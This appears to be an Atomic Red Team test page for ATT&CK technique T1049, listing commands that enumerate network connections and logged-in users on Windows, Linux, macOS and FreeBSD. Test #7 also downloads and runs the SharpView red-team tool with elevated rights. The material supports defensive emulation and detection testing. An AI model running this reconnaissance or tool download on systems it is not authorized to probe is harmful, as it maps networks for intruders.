T1049

Description from ATT&CK

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net. In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and Network Device CLI may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) On ESXi servers, the command esxi network ip connection list can be used to list active network connections.(Citation: Sygnia ESXi Ransomware 2025)

Atomic Tests

• Atomic Test #1 - System Network Connections Discovery

• Atomic Test #2 - System Network Connections Discovery with PowerShell

• Atomic Test #3 - System Network Connections Discovery via PowerShell (Process Mapping)

• Atomic Test #4 - System Network Connections Discovery via ss or lsof (Linux/MacOS)

• Atomic Test #5 - System Network Connections Discovery FreeBSD, Linux & MacOS

• Atomic Test #6 - System Network Connections Discovery via sockstat (Linux, FreeBSD)

• Atomic Test #7 - System Discovery using SharpView

Atomic Test #1 - System Network Connections Discovery

Get a listing of network connections.

Upon successful execution, cmd.exe will execute netstat, net use and net sessions. net sessions requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.

Supported Platforms: Windows

auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5

Attack Commands: Run with command_prompt!

netstat -ano
net use
net sessions 2>nul

Atomic Test #2 - System Network Connections Discovery with PowerShell

Get a listing of network connections. Upon successful execution, powershell.exe will execute get-NetTCPConnection. Results will output via stdout.

Supported Platforms: Windows

auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a

Attack Commands: Run with powershell!

Get-NetTCPConnection

Atomic Test #3 - System Network Connections Discovery via PowerShell (Process Mapping)

Enumerate TCP connections and map to owning process names via PowerShell.

Supported Platforms: Windows

auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5

Attack Commands: Run with powershell!

Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize

Atomic Test #4 - System Network Connections Discovery via ss or lsof (Linux/MacOS)

List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.

Supported Platforms: Linux, macOS

auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f

Attack Commands: Run with bash!

if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi

Atomic Test #5 - System Network Connections Discovery FreeBSD, Linux & MacOS

Get a listing of network connections.

Upon successful execution, sh will execute netstat and who -a. Results will output via stdout.

Supported Platforms: Linux, macOS

auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2

Attack Commands: Run with sh!

netstat
who -a

Dependencies: Run with sh!

Description: Check if netstat command exists on the machine

Check Prereq Commands:

if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

echo "Install netstat on the machine."; exit 1;

Atomic Test #6 - System Network Connections Discovery via sockstat (Linux, FreeBSD)

Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.

Supported Platforms: Linux

auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b

Attack Commands: Run with sh!

sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true

Atomic Test #7 - System Discovery using SharpView

Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout.

Supported Platforms: Windows

auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9

Inputs:

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}

Dependencies: Run with powershell!

Description: Sharpview.exe must exist on disk at specified location (#{SharpView})

Check Prereq Commands:

if (Test-Path "#{SharpView}") {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (split-path "#{SharpView}") -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"